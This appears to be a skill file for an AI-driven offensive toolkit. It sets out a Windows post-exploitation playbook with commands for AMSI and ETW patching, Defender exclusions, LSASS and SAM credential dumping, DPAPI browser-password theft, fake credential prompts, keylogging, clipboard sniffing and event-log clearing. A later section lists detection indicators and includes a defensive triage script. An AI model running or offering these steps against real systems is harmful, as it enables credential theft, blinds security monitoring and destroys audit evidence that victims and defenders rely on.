| name | windows-postexploit |
| description | Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations |
| category | post-exploitation |
| tags | ["windows","post-exploitation","credential-access","defense-evasion","lsass","dpapi","etw","amsi","sam","keylogging"] |
| tech_stack | ["windows","powershell","python","ctypes","win32api"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-312"] |
| chains_with | ["T1003","T1003.001","T1003.002","T1056.001","T1059.001","T1562.001","T1562.006","T1070.001","T1555","T1555.003"] |
| prerequisites | ["T1068","T1548.002"] |
| version | 1.0 |
Windows Post-Exploitation Methodology
Windows post-exploitation uses userland APIs (no kernel driver signing needed) for credential harvesting, monitoring, and stealth. After gaining Administrator access on a Windows target, these tools provide comprehensive credential extraction and operational security capabilities.
Prerequisites
Before deploying winhook tools, verify:
- Administrator access — most operations require elevated privileges
- OS version — Windows 10/11 or Server 2016+ for ETW features
- PowerShell — available natively on all modern Windows
- Python3 — required for ctypes-based tools (ETW, keylogging, DPAPI, clipboard)
- AV/EDR status — run amsi_bypass and etw_blind first if Defender/EDR is active
```powershell
# Quick prerequisite check
whoami /priv                                                     # verify SeDebugPrivilege
Get-MpComputerStatus | Select RealTimeProtectionEnabled          # Defender status
Get-Process lsass                                                # verify LSASS accessible
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL  # PPL status
```
Kill Chain Phases
Phase 1 — AV/EDR Evasion (First priority)
Neutralize monitoring before performing credential operations.
| Action | Command | Purpose |
|---|---|---|
| Bypass AMSI | winhook amsi_bypass | Patch AmsiScanBuffer to allow undetected PowerShell execution |
| Blind ETW | winhook etw_blind | Patch EtwEventWrite to prevent EDR from receiving telemetry |
| Exclude paths | winhook defender_exclude --path C:\Tools | Add Defender exclusion for tool staging directory |
Phase 2 — Credential Harvesting
Extract credentials from multiple sources.
| Action | Command | Purpose |
|---|---|---|
| LSASS dump | winhook lsass_dump | Dump LSASS memory for NTLM hashes, Kerberos tickets, plaintext passwords |
| SAM extraction | winhook sam_dump | Extract registry hives for offline cracking with secretsdump/hashcat |
| DPAPI secrets | winhook dpapi_extract | Decrypt browser passwords, WiFi keys, Windows Vault credentials |
| Credential phishing | winhook credential_prompt | Spawn fake Windows credential dialog to capture user password |
| Keystroke capture | winhook keylog_win --duration 120 | Log keystrokes with active window context |
| Clipboard monitoring | winhook clipboard_sniff --duration 60 | Capture copied passwords, tokens, and sensitive data |
LSASS dumping uses either the MiniDump export of comsvcs.dll (the default) or a direct call to MiniDumpWriteDump from dbghelp.dll. The comsvcs method is preferred because it relies on a Microsoft-signed DLL that is already present on every Windows install.
DPAPI decryption calls CryptUnprotectData from crypt32.dll to decrypt Chrome/Edge Login Data, WiFi passwords, and Windows Credential Vault entries. No additional tools are needed, because the call uses the current user's DPAPI master key; this also means only secrets protected in the current user's context can be decrypted.
SAM extraction uses reg save to dump SAM, SYSTEM, and SECURITY hives. These can be processed offline with impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL.
Phase 3 — Monitoring
Understand the target environment and detect defensive measures.
| Action | Command | Purpose |
|---|---|---|
| Process monitoring | winhook etw_process --duration 60 | Track process creation via ETW — detect security tools, scheduled tasks |
| Network monitoring | winhook etw_network --duration 60 | Track connections via ETW — identify C2 channels, internal services |
Phase 4 — Cleanup (MANDATORY)
Always run cleanup before exiting a target.
```shell
winhook cleanup_win
```
The cleanup tool:
- Clears Security, System, Application, and PowerShell event logs
- Removes temporary files matching CyberStrike patterns
- Removes any Defender exclusions that were added
- Reports on AMSI/ETW patches (require process restart to fully restore)
Detection Considerations
Windows post-exploitation tools are detectable by:
- Sysmon — Event IDs 1 (process create), 10 (process access, in particular handles opened on lsass.exe), 13 (registry value set)
- Windows Event Log — Event ID 4688 (process creation), 4624/4625 (logon), 1102 (audit log cleared)
- EDR — LSASS access monitoring, credential prompt anomaly detection
- PPL (Protected Process Light) — LSASS running as PPL blocks direct memory dumps from non-PPL processes (check the RunAsPPL registry key)
- Credential Guard — Isolates derived credentials in a virtualization-based security process (LSAIso), so comsvcs/MiniDump dumps of LSASS no longer contain the protected NTLM hashes and Kerberos keys
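As a defender-side companion to the indicators above, the following added example (not part of the winhook toolkit) runs triage rules over constructed Sysmon and Security events for the event IDs listed: lsass process access with a memory-read right, comsvcs MiniDump and reg save command lines, Defender exclusion registry writes, and 1102 log clears. The allowlist of benign lsass accessors and the event field names are assumptions (field names follow Sysmon's XML schema); tune them against your own baseline.

```python
from typing import Dict, List

PROCESS_VM_READ = 0x0010  # access right every memory-dump API needs on lsass
# Assumed allowlist of legitimate lsass accessors; tune against your own baseline.
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe"}
HIVES = ("hklm\\sam", "hklm\\system", "hklm\\security")

def triage(event: Dict) -> List[str]:
    """Return the names of the detections the event matches (empty if none)."""
    hits = []
    chan, eid = event.get("Channel"), event.get("EventID")
    if chan == "Sysmon" and eid == 10:  # ProcessAccess
        target = event.get("TargetImage", "").lower()
        source = event.get("SourceImage", "").lower().rsplit("\\", 1)[-1]
        granted = int(event.get("GrantedAccess", "0x0"), 16)
        if (target.endswith("\\lsass.exe") and granted & PROCESS_VM_READ
                and source not in LSASS_ALLOWLIST):
            hits.append("lsass-memory-read")
    elif chan == "Sysmon" and eid == 1:  # ProcessCreate
        cmd = event.get("CommandLine", "").lower()
        if "comsvcs.dll" in cmd and "minidump" in cmd:
            hits.append("comsvcs-minidump")
        if cmd.startswith(("reg ", "reg.exe ")) and " save " in cmd and any(h in cmd for h in HIVES):
            hits.append("registry-hive-save")
    elif chan == "Sysmon" and eid == 13:  # RegistryEvent (value set)
        if "\\windows defender\\exclusions\\" in event.get("TargetObject", "").lower():
            hits.append("defender-exclusion-change")
    elif chan == "Security" and eid == 1102:  # audit log cleared
        hits.append("security-log-cleared")
    return hits

# Constructed sample telemetry (not from a real host); field names follow Sysmon's schema.
SAMPLE_EVENTS = [
    {"Channel": "Sysmon", "EventID": 10, "SourceImage": r"C:\Users\bob\python.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"Channel": "Sysmon", "EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"Channel": "Sysmon", "EventID": 1, "CommandLine": "rundll32.exe comsvcs.dll, MiniDump <pid> <outfile> full"},
    {"Channel": "Sysmon", "EventID": 1, "CommandLine": r"reg.exe save HKLM\SAM C:\Tools\sam.hiv"},
    {"Channel": "Sysmon", "EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Tools"},
    {"Channel": "Security", "EventID": 1102},
    {"Channel": "Sysmon", "EventID": 1, "CommandLine": "notepad.exe"},  # benign control
]

def triage_all(events: List[Dict]) -> List[tuple]:
    """Run every rule over a batch; returns (event index, detection name) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in triage(ev)]
```

The allowlisted csrss.exe access (event 1) and the benign notepad launch (event 6) produce no hits, which is the point of keying the lsass rule on the access mask plus an allowlist rather than on any handle to lsass.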
Program Reference
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| lsass_dump | LSASS memory dump via MiniDumpWriteDump | T1003.001 — LSASS Memory |
| sam_dump | Registry hive extraction (SAM/SYSTEM/SECURITY) | T1003.002 — Security Account Manager |
| dpapi_extract | DPAPI secret decryption via CryptUnprotectData | T1555.003 — Credentials from Web Browsers |
| credential_prompt | Fake credential dialog via CredUI | T1056.002 — GUI Input Capture |
| keylog_win | Keystroke capture via SetWindowsHookEx | T1056.001 — Keylogging |
| etw_process | Process monitoring via ETW provider | T1057 — Process Discovery |
| etw_network | Network monitoring via ETW provider | T1049 — System Network Connections Discovery |
| clipboard_sniff | Clipboard monitoring via Win32 API | T1115 — Clipboard Data |
| amsi_bypass | AMSI patching in memory | T1562.001 — Disable or Modify Tools |
| etw_blind | ETW patching to blind EDR | T1562.006 — Indicator Blocking |
| defender_exclude | Windows Defender exclusion management | T1562.001 — Disable or Modify Tools |
| cleanup_win | Event log clearing and artifact removal | T1070.001 — Clear Windows Event Logs |